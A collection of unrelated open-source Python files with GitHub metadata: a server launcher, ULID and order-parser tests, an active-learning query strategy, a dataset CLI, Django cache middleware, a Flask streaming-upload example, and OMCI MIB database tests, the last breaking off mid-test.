"copies": "1",
"ref": "refs/heads/develop",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
from gevent import monkey
monkey.patch_all()
import os
import logging.config
import sys
from werkzeug.serving import run_simple
if __name__ == "__main__":
assert len(sys.argv) == 2, "Usage: pulsus <config_dir>"
config_dir = sys.argv[1]
# Must go 1st
logging.config.fileConfig(os.path.join(config_dir, 'logging.conf'))
logger = logging.getLogger(__name__)
from . import server
config = server.read_config(config_dir)
server = server.setup(config)
server_address = config.get('server', 'address')
server_port = config.getint('server', 'port')
logger.info("Pulsus started")
run_simple(server_address, server_port, server)
| {
"content_hash": "00e0a314c9321254e509e647acdb085a",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 71,
"avg_line_length": 25.923076923076923,
"alnum_prop": 0.6765578635014837,
"repo_name": "pennersr/pulsus",
"id": "d85909ed8dd0680ff496ae7f9d06ce182b99470c",
"size": "674",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pulsus/server/serve.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25909"
}
],
"symlink_target": ""
} |
"""
test_module
~~~~~~~~~~~
Tests for the :mod:`~ulid` module.
"""
from ulid import consts
def test_min_timestamp_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MIN_TIMESTAMP` uses expected byte value.
"""
value = consts.MIN_TIMESTAMP
assert value == b'\x00\x00\x00\x00\x00\x00'
def test_max_timestamp_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MAX_TIMESTAMP` uses expected byte value.
"""
value = consts.MAX_TIMESTAMP
assert value == b'\xff\xff\xff\xff\xff\xff'
def test_min_randomness_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MIN_RANDOMNESS` uses expected byte value.
"""
value = consts.MIN_RANDOMNESS
assert value == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
def test_max_randomness_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MAX_RANDOMNESS` uses expected byte value.
"""
value = consts.MAX_RANDOMNESS
assert value == b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff'
def test_min_ulid_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MIN_ULID` uses expected byte value.
"""
value = consts.MIN_ULID
assert value == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
def test_max_ulid_uses_expected_value():
"""
Assert that :func:`~ulid.consts.MAX_ULID` uses expected byte value.
"""
value = consts.MAX_ULID
assert value == b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff'
| {
"content_hash": "ba24e7abaeef34e316d5638dfff68599",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 87,
"avg_line_length": 27.017543859649123,
"alnum_prop": 0.6512987012987013,
"repo_name": "ahawker/ulid",
"id": "4b6e1bf3043cfa879011e87ed14d667a1d522023",
"size": "1540",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_consts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "3387"
},
{
"name": "PowerShell",
"bytes": "7195"
},
{
"name": "Python",
"bytes": "93605"
}
],
"symlink_target": ""
} |
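A small sketch restating the byte layout the constants above encode, using only values asserted by these tests: a ULID is a 6-byte timestamp followed by 10 bytes of randomness, 16 bytes in total.

MIN_TIMESTAMP = b'\x00' * 6
MAX_TIMESTAMP = b'\xff' * 6
MIN_RANDOMNESS = b'\x00' * 10
MAX_RANDOMNESS = b'\xff' * 10

# A ULID is a 6-byte timestamp followed by 10 bytes of randomness.
MIN_ULID = MIN_TIMESTAMP + MIN_RANDOMNESS
MAX_ULID = MAX_TIMESTAMP + MAX_RANDOMNESS
assert len(MIN_ULID) == len(MAX_ULID) == 16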
"""Density Weighted
"""
from __future__ import division
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.cluster import KMeans
from libact.base.interfaces import QueryStrategy
from libact.utils import inherit_docstring_from, seed_random_state, zip
class DensityWeightedMeta(QueryStrategy):
"""Density Weighted Meta Algorithm
:math:`\phi_A` represents the output of some base query strategy :math:`A`.
The instance to query is given as follows:
:math:`argmax_{\mathbf{x}} \phi_A(\mathbf{x}) \times (\frac{1}{U} \Sigma^{U}_{u=1} sim(\mathbf{x}, \mathbf{x}^{(u)}))^{\beta}`
The :math:`sim` function in this implementation is computed by first
running a clustering algorithm, which outputs :math:`U` cluster centers.
We then use the similarity metric to calculate the average similarity of
the given instance :math:`\mathbf{x}` to each cluster center.
Parameters
----------
base_query_strategy:
The query strategy has to support the _get_scores() method.
similarity_metric: sklearn.metrics.pairwise class instance, optional (default=cosine_similarity)
http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.cosine_similarity.html
clustering_method: sklearn.cluster class instance, optional (default=Kmeans())
should support method fit and transform and attribute cluster_centers_.
(reference: http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html)
beta : float
Scaling factor for the similarity term.
random_state : {int, np.random.RandomState instance, None}, optional (default=None)
If int or None, random_state is passed as parameter to generate
np.random.RandomState instance. if np.random.RandomState instance,
random_state is the random number generate.
Attributes
----------
Examples
--------
Here is an example of how to declare a DensityWeightedMeta query_strategy object:
.. code-block:: python
from libact.query_strategies import DensityWeightedMeta, UncertaintySampling
from libact.models import LogisticRegression
qs = DensityWeightedMeta(dataset, UncertaintySampling(dataset, model=LogisticRegression()))
References
----------
.. [1] Settles, Burr. "Active learning literature survey." University of
Wisconsin, Madison 52.55-66 (2010): 11.
"""
def __init__(self, dataset, base_query_strategy, similarity_metric=None,
clustering_method=None, beta=1.0, random_state=None):
super(DensityWeightedMeta, self).__init__(dataset=dataset)
if not isinstance(base_query_strategy, QueryStrategy):
raise TypeError(
"'base_query_strategy' has to be an instance of 'QueryStrategy'"
)
if base_query_strategy.dataset != self.dataset:
raise ValueError("base_query_strategy should share the same"
"dataset instance with DensityWeightedMeta")
self.base_query_strategy = base_query_strategy
self.beta = beta
self.random_state_ = seed_random_state(random_state)
if clustering_method is not None:
self.clustering_method = clustering_method
else:
self.clustering_method = KMeans(
n_clusters=5, random_state=self.random_state_)
if similarity_metric is not None:
self.similarity_metric = similarity_metric
else:
self.similarity_metric = cosine_similarity
@inherit_docstring_from(QueryStrategy)
def update(self, entry_id, label):
pass
@inherit_docstring_from(QueryStrategy)
def _get_scores(self):
dataset = self.dataset
X, _ = zip(*dataset.data)
scores = self.base_query_strategy._get_scores()
_, X_pool = dataset.get_unlabeled_entries()
unlabeled_entry_ids, base_scores = zip(*scores)
self.clustering_method.fit(X)
pool_cluster = self.clustering_method.predict(X_pool)
cluster_center = self.clustering_method.cluster_centers_
similarity = []
for i in range(len(X_pool)):
similarity.append(
self.similarity_metric(
X_pool[i].reshape(1, -1),
cluster_center[pool_cluster[i]].reshape(1, -1)
)[0][0]
)
similarity = np.asarray(similarity)
scores = base_scores * similarity**self.beta
return zip(unlabeled_entry_ids, scores)
@inherit_docstring_from(QueryStrategy)
def make_query(self):
dataset = self.dataset
unlabeled_entry_ids, scores = zip(*self._get_scores())
ask_id = self.random_state_.choice(np.where(scores == np.max(scores))[0])
return unlabeled_entry_ids[ask_id]
| {
"content_hash": "02d23aa7b41c9e838bda9862a8ebb53b",
"timestamp": "",
"source": "github",
"line_count": 131,
"max_line_length": 130,
"avg_line_length": 36.6793893129771,
"alnum_prop": 0.6499479708636836,
"repo_name": "ntucllab/libact",
"id": "b89f517b5ba7721ffecb9cf592037dff32f5843d",
"size": "4805",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libact/query_strategies/density_weighted_meta.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "24287"
},
{
"name": "C++",
"bytes": "37716"
},
{
"name": "Python",
"bytes": "206547"
}
],
"symlink_target": ""
} |
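A numpy sketch (not part of libact) of the scoring rule from the DensityWeightedMeta docstring above: the base strategy's score is multiplied by the average similarity raised to beta. All input values below are hypothetical.

import numpy as np

def density_weighted_scores(base_scores, similarity, beta=1.0):
    # score(x) = phi_A(x) * (average similarity to cluster centers) ** beta
    return np.asarray(base_scores) * np.asarray(similarity) ** beta

base = [0.9, 0.5, 0.7]   # hypothetical phi_A outputs for three candidates
sim = [0.2, 0.95, 0.6]   # hypothetical average similarities
# Candidate 1 wins: a dense region beats a high-scoring lone outlier.
print(np.argmax(density_weighted_scores(base, sim)))  # -> 1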
import sys
import re
import yaml
import datetime
import os.path
import exceptions
from functools import wraps
from docopt import docopt
__version__ = '0.1.0'
defaultconfigs = [ os.path.join(sys.path[0],'datasets.yml'),
'/etc/datasets.yml',
os.path.expanduser('~/.datasets.yml'),
'./datasets.yml' ]
class Dataset:
"""Represents a dataset"""
def __init__(self, path, basedir = None):
self.basedir = basedir or os.path.dirname(path)
self.path = path
self._info()
def _info(self):
readme = os.path.join(self.path,'README')
if not os.path.isfile(readme):
raise InvalidDatasetException(
'Invalid dataset %s. Does not contain a README file.'%self.path)
self.name = os.path.relpath(self.path, self.basedir)
doc = yaml_safe_load_first(open(readme))
if not doc.get('dataset'):
raise InvalidDatasetException(
"Invalid dataset %s. Expected README YAML frontmatter to have 'dataset: true'." % self.path)
self.description = doc.get('description', "")
def get_subdatasets(self):
sub = []
subfiles = [os.path.join(self.path, i) for i in os.listdir(self.path)]
for d in [i for i in subfiles if os.path.isdir(i)]:
try:
sub.append(Dataset(d, basedir=self.basedir))
except (InvalidDatasetException):
pass
return sub
class InvalidDatasetException(exceptions.Exception):
pass
def argparsed(func):
@wraps(func)
def wrapped(argv, config):
args = docopt(func.__doc__, argv=argv)
return func(args, config)
return wrapped
def load_configs(configs):
paths = set()
for i in [f for f in configs if os.path.isfile(f)]:
for y in yaml.safe_load_all(open(i)):
paths.update(set(y.get('datasets',[])))
break  # only read the first YAML document per file
datasets = []
for i in paths:
try:
datasets.append(Dataset(i))
except (InvalidDatasetException):
pass # TODO: verbose warning
return {"datasets":datasets}
def get_dataset(path, roots):
if path.startswith('/'):
return Dataset(path)
head = path.split('/')[0]
for root in roots:
if head == os.path.basename(root.path):
return Dataset(os.path.join(os.path.dirname(root.path),path))
raise InvalidDatasetException("%s is not a dataset" % path)
@argparsed
def list(args, config):
"""
Usage: datasets list [options] [<dataset>...]
Show a short description for each of the available <dataset>s.
Options:
<dataset> Dataset name.
-r --recursive List all subdatasets.
--verbose Include more detailed descriptions if available.
Notes:
A dataset is simply a folder that has a README file that begins with:
---
dataset: true
description: optionally, a description here
---
You can register datasets by creating a file in ~/.datasets.yml, or
./datasets.yml that starts with the following:
---
datasets:
# just include the path to the dataset folder
# NOTE: folder must include a README
- /data/all_nsa_data/
- /data/mitt_romney_taxes/
"""
def _print_dataset(ds, args):
print " - {:<30} {:<30}".format(ds.name, ds.description)
if args["--verbose"]:
print " {:<30} Location: {:<30}".format("", ds.path)
if args["--recursive"]:
for i in ds.get_subdatasets():
_print_dataset(i, args)
if not config["datasets"]:
print "No datasets found."
return
sets = config['datasets']
if args['<dataset>']:
args['--recursive'] = True
try:
sets = map(lambda x: get_dataset(x, sets), args['<dataset>'])
except InvalidDatasetException, e:
print >> sys.stderr, "ERROR: %s" % e
sys.exit(-1)
print "Datasets:"
for ds in sets:
_print_dataset(ds, args)
print
@argparsed
def copy(args, config):
"""
Usage: datasets copy [options] <dataset>...
Make a lightweight copy of a <dataset>.
Options:
<dataset> Dataset Name
-c, --clobber Clobber existing files [Default: False]
-n, --dry-run Show what would happen.
"""
if not config["datasets"]:
print "No datasets found."
return
try:
sets = map(lambda x: get_dataset(x, config['datasets']), args['<dataset>'])
except InvalidDatasetException, e:
print >> sys.stderr, "ERROR: %s" % e
sys.exit(-1)
for ds in sets:
rootdir = ds.name
os.mkdir(rootdir)
for (path, dirs, files) in os.walk(ds.path):
relpath = os.path.relpath(path,ds.path)
for f in files:
source = os.path.realpath(os.path.join(ds.path,path,f))
target = os.path.join(rootdir,relpath,f)
if relpath == "." and f == 'README':
frontmatter, rest = get_readme(source)
frontmatter['source'] = ds.path
frontmatter['datecopied'] = datetime.datetime.now()
t = open(target, "w")
t.write(yaml.dump(frontmatter,
explicit_start = True, default_flow_style = False))
t.write('---\n')
t.write(rest)
t.close()
else:
os.symlink(source, target)
for d in dirs:
os.mkdir(os.path.join(rootdir,relpath,d))
@argparsed
def create(args, config):
"""
A dataset itself is simply any folder with a specially formatted README file
in it. The README file must start with the following:
---
dataset: true
description: A short one-liner description of the dataset
includes:
- folder1
- folder2
---
And may be followed by anything else.
"""
pass
def get_readme(path):
"""returns (yamldoc, rest)"""
content = open(path).read()
match = re.match( r'^(---\s*$.*?^---\s*$)(.*)', content, re.MULTILINE | re.DOTALL )
return (yaml_safe_load_first(match.group(1)), match.group(2))
def yaml_safe_load_first(content):
for i in yaml.safe_load_all(content):
return i
def main(argv = None):
"""datasets is a simple utility for discovering datasets and making lightweight
copies to use in analyses.
Usage:
datasets <command> [<options>...]
General Options:
-h, --help Show help.
--version Show version and exit.
Commands:
list List available datasets.
copy Get a lightweight copy of a dataset.
create Create an empty dataset.
register Register a dataset in ~/.datasets.yml.
bash_completion Add bash autocomplete code to your ~/.bashrc
See 'datasets help <command>' for more information on a specific command."""
args = docopt(main.__doc__,
version='datasets version %s' % __version__,
options_first=True,
argv=argv or sys.argv[1:])
cmd = args['<command>']
try:
method = globals()[cmd]
assert callable(method)
except (KeyError, AssertionError):
exit("%r is not a datasets command. See 'datasets help'." % cmd)
config = load_configs(defaultconfigs)
argv = [args['<command>']] + args['<options>']
return method(argv, config)
if __name__ == '__main__':
main()
| {
"content_hash": "d1acd77b2ce9c5ff8a452d77494b954b",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 108,
"avg_line_length": 30.03529411764706,
"alnum_prop": 0.5709622666144405,
"repo_name": "pipitone/datasets",
"id": "71c65e45b624b528f2b15a58af89964b25c166e1",
"size": "7705",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "datasets.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5732"
}
],
"symlink_target": ""
} |
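A self-contained sketch of the README frontmatter convention documented under 'datasets list' above, reusing the same regex as get_readme; the README content is hypothetical.

import re
import yaml

README = """---
dataset: true
description: optionally, a description here
---
Anything else may follow the frontmatter.
"""

# Same pattern as get_readme: group 1 is the YAML frontmatter, group 2 the rest.
match = re.match(r'^(---\s*$.*?^---\s*$)(.*)', README, re.MULTILINE | re.DOTALL)
frontmatter = next(iter(yaml.safe_load_all(match.group(1))))
assert frontmatter['dataset'] is True
print(frontmatter['description'])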
"""
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Feb 4, 2011.
"""
from everest.querying.operators import ASCENDING
from everest.querying.operators import DESCENDING
from everest.querying.orderparser import parse_order
from everest.querying.specifications import AscendingOrderSpecification
from everest.querying.specifications import ConjunctionOrderSpecification
from everest.querying.specifications import DescendingOrderSpecification
from everest.testing import TestCaseWithConfiguration
from pyparsing import ParseException
__docformat__ = 'reStructuredText en'
__all__ = ['OrderParserTestCase',
]
class OrderParserTestCase(TestCaseWithConfiguration):
def set_up(self):
TestCaseWithConfiguration.set_up(self)
self.parser = parse_order
def test_no_criterion_query(self):
expr = ''
self.assert_raises(ParseException, self.parser, expr)
def test_one_sort_order(self):
expr = 'name:asc'
result = self.parser(expr)
self.assert_true(isinstance(result, AscendingOrderSpecification))
self.assert_equal(result.attr_name, 'name')
self.assert_equal(result.operator, ASCENDING)
def test_one_sort_order_reversed(self):
expr = 'name:desc'
result = self.parser(expr)
self.assert_true(isinstance(result, DescendingOrderSpecification))
self.assert_equal(result.attr_name, 'name')
self.assert_equal(result.operator, DESCENDING)
def test_two_sort_order_left_reversed(self):
expr = 'name:desc~age:asc'
result = self.parser(expr)
self.assert_true(isinstance(result, ConjunctionOrderSpecification))
self.assert_true(isinstance(result.left,
DescendingOrderSpecification))
self.assert_true(isinstance(result.right,
AscendingOrderSpecification))
self.assert_equal(result.left.attr_name, 'name')
self.assert_equal(result.left.operator, DESCENDING)
self.assert_equal(result.right.attr_name, 'age')
self.assert_equal(result.right.operator, ASCENDING)
| {
"content_hash": "7483795b48508575d93230ce7e986ccb",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 76,
"avg_line_length": 40.127272727272725,
"alnum_prop": 0.7072949705482555,
"repo_name": "helixyte/everest",
"id": "7e9971363e4950048fed2656c4b80a89c0bb1787",
"size": "2207",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "everest/tests/test_orderparser.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "255"
},
{
"name": "Makefile",
"bytes": "4594"
},
{
"name": "Python",
"bytes": "1167712"
},
{
"name": "Shell",
"bytes": "4513"
}
],
"symlink_target": ""
} |
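A standalone sketch (not part of everest) of the order-expression grammar these tests exercise: criteria are attribute:direction pairs joined by '~'. It returns plain tuples rather than specification objects.

def parse_order_expr(expr):
    # 'name:desc~age:asc' -> [('name', 'desc'), ('age', 'asc')]
    if not expr:
        raise ValueError('no criterion given')
    criteria = []
    for part in expr.split('~'):
        attr, _, direction = part.partition(':')
        if direction not in ('asc', 'desc'):
            raise ValueError('invalid sort direction: %r' % direction)
        criteria.append((attr, direction))
    return criteria

print(parse_order_expr('name:desc~age:asc'))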
import zlib
from django.middleware.cache import UpdateCacheMiddleware
from django.utils.cache import patch_response_headers, get_max_age, has_vary_header
from django.core.cache import cache
import collections
class UpdateCacheMiddlewareSimpleKey(UpdateCacheMiddleware):
"""
Response-phase cache middleware that updates the cache if the response is
cacheable.
Must be used as part of the two-part update/fetch cache middleware.
UpdateCacheMiddleware must be the first piece of middleware in
MIDDLEWARE_CLASSES so that it'll get called last during the response phase.
THIS IS A PATCHED VERSION OF WHAT IS IN DJANGO SO THAT NGINX CAN GET THE PAGES OUT EASILY
"""
def process_response(self, request, response):
"""Sets the cache, if needed."""
#if not self._should_update_cache(request, response):
# # We don't need to update the cache, just return.
# return response
if response.streaming or response.status_code != 200:
return response
# Don't cache responses that set a user-specific (and maybe security
# sensitive) cookie in response to a cookie-less request.
if not request.COOKIES and response.cookies and has_vary_header(response, 'Cookie'):
return response
# Try to get the timeout from the "max-age" section of the "Cache-
# Control" header before reverting to using the default cache_timeout
# length.
timeout = get_max_age(response)
if timeout is None:
timeout = self.cache_timeout
elif timeout == 0:
# max-age was set to 0, don't bother caching.
return response
patch_response_headers(response, timeout)
if timeout:
cache_key = "%s-%s" % (self.key_prefix, request.get_full_path())
#raise ValueError(cache_key)
if hasattr(response, 'render') and isinstance(response.render, collections.Callable):
response.add_post_render_callback(
lambda r: cache._cache.set(cache_key.encode("utf-8"), zlib.compress(r.content, 9), timeout)
)
else:
# use the highest compression level; since the result is cached, the extra CPU cost should pay off
cache._cache.set(cache_key.encode("utf-8"), zlib.compress(response.content, 9), timeout)
return response
| {
"content_hash": "db8a3583ded97403442ab211a17f370d",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 111,
"avg_line_length": 45.660377358490564,
"alnum_prop": 0.6528925619834711,
"repo_name": "codefisher/codefisher_apps",
"id": "f7d35d9f95c295276d0fee64ff564d7c8bee3cc3",
"size": "2420",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "middleware.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1920"
},
{
"name": "HTML",
"bytes": "32105"
},
{
"name": "JavaScript",
"bytes": "1146"
},
{
"name": "Python",
"bytes": "115129"
}
],
"symlink_target": ""
} |
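A sketch of the simple key layout the middleware above writes, assuming a memcached-style cache object with set/get; the helper names are hypothetical. Using the raw '<prefix>-<path>' key is what lets nginx compute the same key straight from the request path.

import zlib

def store_page(cache, key_prefix, full_path, content, timeout):
    # Key layout used by the middleware: "<prefix>-<full request path>".
    cache_key = '%s-%s' % (key_prefix, full_path)
    cache.set(cache_key.encode('utf-8'), zlib.compress(content, 9), timeout)

def load_page(cache, key_prefix, full_path):
    # Returns the decompressed page, or None on a cache miss.
    blob = cache.get(('%s-%s' % (key_prefix, full_path)).encode('utf-8'))
    return zlib.decompress(blob) if blob is not None else None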
import os
import tempfile
import time
from textwrap import dedent
from flask import Flask, request
from streaming_form_data import StreamingFormDataParser
from streaming_form_data.targets import FileTarget
app = Flask(__name__)
page = dedent(
'''
<!doctype html>
<head>
<title>Upload new File</title>
</head>
<body>
<h1>Upload new File</h1>
<form method="post" enctype="multipart/form-data" id="upload-file">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
</body>
'''
)
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
file_ = FileTarget(os.path.join(tempfile.gettempdir(), 'test'))
parser = StreamingFormDataParser(headers=request.headers)
parser.register('file', file_)
time_start = time.perf_counter()
while True:
chunk = request.stream.read(8192)
if not chunk:
break
parser.data_received(chunk)
time_finish = time.perf_counter()
response = dedent(
'''
<!doctype html>
<head>
<title>Done!</title>
</head>
<body>
<h1>
{file_name} ({content_type}): upload done
</h1>
<h2>
Time spent on file reception: {duration}s
</h2>
</body>
'''.format(
file_name=file_.multipart_filename,
content_type=file_.multipart_content_type,
duration=(time_finish - time_start),
)
)
return response
return page
if __name__ == '__main__':
app.run(host='0.0.0.0')
| {
"content_hash": "324b4bdc2252249e89eb1ebdf6709f74",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 75,
"avg_line_length": 23.363636363636363,
"alnum_prop": 0.5175097276264592,
"repo_name": "siddhantgoel/streaming-form-data",
"id": "ea8832fc7514fcae63f7d2e4249d35750f4fb132",
"size": "1819",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "examples/flask/upload-test.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Cython",
"bytes": "15701"
},
{
"name": "Makefile",
"bytes": "982"
},
{
"name": "Python",
"bytes": "55599"
}
],
"symlink_target": ""
} |
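A minimal in-memory example of the same parser API the Flask view above uses, with ValueTarget in place of FileTarget; the multipart body here is hand-built and hypothetical.

from streaming_form_data import StreamingFormDataParser
from streaming_form_data.targets import ValueTarget

headers = {'Content-Type': 'multipart/form-data; boundary=boundary'}
body = (b'--boundary\r\n'
        b'Content-Disposition: form-data; name="name"\r\n'
        b'\r\n'
        b'hello\r\n'
        b'--boundary--\r\n')

parser = StreamingFormDataParser(headers=headers)
target = ValueTarget()
parser.register('name', target)

# Feed the body in small chunks, as the view does with request.stream.
for i in range(0, len(body), 8):
    parser.data_received(body[i:i + 8])

print(target.value)  # b'hello'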
from unittest import main, TestCase
from voltha.extensions.omci.omci_entities import *
from voltha.extensions.omci.database.mib_db_dict import *
from voltha.extensions.omci.database.mib_db_api import MODIFIED_KEY, CREATED_KEY,\
DEVICE_ID_KEY, MDS_KEY, LAST_SYNC_KEY
from mock.mock_adapter_agent import MockAdapterAgent, MockDevice
from nose.tools import raises, assert_raises
import time
_DEVICE_ID = 'br-549'
class TestOmciMibDbDict(TestCase):
def setUp(self):
self.adapter_agent = MockAdapterAgent()
self.adapter_agent.add_device(MockDevice(_DEVICE_ID)) # For Entity class lookups
self.db = MibDbVolatileDict(self.adapter_agent)
def tearDown(self):
self.db.stop()
def test_start_stop(self):
# Simple start stop
self.assertFalse(self.db.active)
self.db.start()
self.assertTrue(self.db.active)
self.db.stop()
self.assertFalse(self.db.active)
# Start after start still okay
self.db.start()
self.db.start()
self.assertTrue(self.db.active)
self.db.stop()
self.db.stop()
self.assertFalse(self.db.active)
@raises(DatabaseStateError)
def test_bad_state_add(self):
self.db.add(_DEVICE_ID)
@raises(DatabaseStateError)
def test_bad_state_remove(self):
self.db.remove(_DEVICE_ID)
@raises(DatabaseStateError)
def test_bad_state_query_1(self):
self.db.query(_DEVICE_ID, 0)
@raises(DatabaseStateError)
def test_bad_state_query_2(self):
self.db.query(_DEVICE_ID, 0, 0)
@raises(DatabaseStateError)
def test_bad_state_query_3(self):
self.db.query(_DEVICE_ID, 0, 0, 'test')
@raises(DatabaseStateError)
def test_bad_state_set(self):
self.db.set(_DEVICE_ID, 0, 0, {'test': 123})
@raises(DatabaseStateError)
def test_bad_state_delete(self):
self.db.delete(_DEVICE_ID, 0, 0)
@raises(KeyError)
def test_no_device_query(self):
self.db.start()
self.db.query(_DEVICE_ID)
def test_no_device_last_sync(self):
self.db.start()
# Returns None, not a KeyError
value = self.db.get_last_sync(_DEVICE_ID)
self.assertIsNone(value)
def test_no_device_mds(self):
self.db.start()
# Returns None, not a KeyError
value = self.db.get_mib_data_sync(_DEVICE_ID)
self.assertIsNone(value)
@raises(KeyError)
def test_no_device_save_last_sync(self):
self.db.start()
self.db.save_last_sync(_DEVICE_ID, datetime.utcnow())
@raises(KeyError)
def test_no_device_save_mds(self):
self.db.start()
self.db.save_mib_data_sync(_DEVICE_ID, 123)
def test_param_types(self):
self.db.start()
assert_raises(TypeError, self.db.add, 123)
assert_raises(TypeError, self.db.remove, 123)
assert_raises(TypeError, self.db.query, 123)
assert_raises(TypeError, self.db.get_mib_data_sync, 123)
assert_raises(TypeError, self.db.save_mib_data_sync, 123, 0)
assert_raises(TypeError, self.db.save_mib_data_sync, _DEVICE_ID, 'zero')
assert_raises(TypeError, self.db.get_last_sync, 123)
assert_raises(TypeError, self.db.save_last_sync, 123, datetime.utcnow())
assert_raises(TypeError, self.db.save_last_sync, _DEVICE_ID, 'bad-date')
assert_raises(TypeError, self.db.set, 123, 0, 0, {'test': 0})
assert_raises(TypeError, self.db.set, None, 0, 0, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, None, 0, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, 0, None, {'test': 0})
assert_raises(TypeError, self.db.set, _DEVICE_ID, 0, 0, None)
assert_raises(TypeError, self.db.set, _DEVICE_ID, 0, 0, 'not-a-dict')
assert_raises(ValueError, self.db.set, _DEVICE_ID, -1, 0, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, 0x10000, 0, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, 0, -1, {'test': 0})
assert_raises(ValueError, self.db.set, _DEVICE_ID, 0, 0x10000, {'test': 0})
assert_raises(TypeError, self.db.delete, 123, 0, 0)
assert_raises(ValueError, self.db.delete, _DEVICE_ID, -1, 0)
assert_raises(ValueError, self.db.delete, _DEVICE_ID, 0x10000, 0)
assert_raises(ValueError, self.db.delete, _DEVICE_ID, 0, -1)
assert_raises(ValueError, self.db.delete, _DEVICE_ID, 0, 0x10000)
def test_add_remove_device(self):
self.db.start()
# Remove of non-existent device is not an error
assert_raises(KeyError, self.db.query, _DEVICE_ID)
self.db.remove(_DEVICE_ID)
start_time = datetime.utcnow()
self.db.add(_DEVICE_ID)
dev_data = self.db.query(_DEVICE_ID)
end_time = datetime.utcnow()
self.assertEqual(dev_data[DEVICE_ID_KEY], _DEVICE_ID)
self.assertEqual(dev_data[MDS_KEY], 0)
self.assertIsNone(dev_data[LAST_SYNC_KEY])
self.assertEqual(dev_data[VERSION_KEY], MibDbVolatileDict.CURRENT_VERSION)
# Remove it
self.db.remove(_DEVICE_ID)
assert_raises(KeyError, self.db.query, _DEVICE_ID)
# Remove of a non-existent device is okay
self.db.remove(_DEVICE_ID + 'abcd')
# Overwrite tests
self.db.add(_DEVICE_ID)
assert_raises(KeyError, self.db.add, _DEVICE_ID)
self.db.add(_DEVICE_ID, overwrite=True) # This is okay
def test_mib_data_sync(self):
self.db.start()
self.db.add(_DEVICE_ID)
self.assertEqual(self.db.get_mib_data_sync(_DEVICE_ID), 0)
self.db.save_mib_data_sync(_DEVICE_ID, 100)
self.assertEqual(self.db.get_mib_data_sync(_DEVICE_ID), 100)
assert_raises(ValueError, self.db.save_mib_data_sync, _DEVICE_ID, -1)
assert_raises(ValueError, self.db.save_mib_data_sync, _DEVICE_ID, 256)
def test_last_sync(self):
self.db.start()
self.assertIsNone(self.db.get_last_sync(_DEVICE_ID))
self.db.add(_DEVICE_ID)
self.assertIsNone(self.db.get_last_sync(_DEVICE_ID))
now = datetime.utcnow()
self.db.save_last_sync(_DEVICE_ID, now)
self.assertEqual(self.db.get_last_sync(_DEVICE_ID), now)
assert_raises(TypeError, self.db.save_last_sync, _DEVICE_ID, 'hello')
def test_set_and_query(self):
self.db.start()
self.db.add(_DEVICE_ID) # Base device DB created here
time.sleep(0.1)
class_id = OntG.class_id
inst_id = 0
attributes = {'vendor_id': 'ABCD'}
start_time = datetime.utcnow()
set_occurred = self.db.set(_DEVICE_ID, class_id, inst_id, attributes)
self.assertTrue(set_occurred)
end_time = datetime.utcnow()
dev_data = self.db.query(_DEVICE_ID)
self.assertEqual(dev_data[DEVICE_ID_KEY], _DEVICE_ID)
dev_classes = [v for k, v in dev_data.items() if isinstance(k, int)]
self.assertEqual(len(dev_classes), 1)
class_data = dev_classes[0]
self.assertEqual(class_data[CLASS_ID_KEY], class_id)
class_insts = [v for k, v in class_data.items() if isinstance(k, int)]
self.assertEqual(len(class_insts), 1)
inst_data = class_insts[0]
self.assertEqual(inst_data[INSTANCE_ID_KEY], inst_id)
self.assertGreaterEqual(inst_data[MODIFIED_KEY], start_time)
self.assertLessEqual(inst_data[MODIFIED_KEY], end_time)
self.assertLessEqual(inst_data[CREATED_KEY], inst_data[MODIFIED_KEY])
inst_attributes = inst_data[ATTRIBUTES_KEY]
self.assertEqual(len(inst_attributes), 1)
self.assertTrue('vendor_id' in inst_attributes)
self.assertEqual(inst_attributes['vendor_id'], attributes['vendor_id'])
########################################
# Query with device and class. Should be same as from full device query
cls_2_data = self.db.query(_DEVICE_ID, class_id)
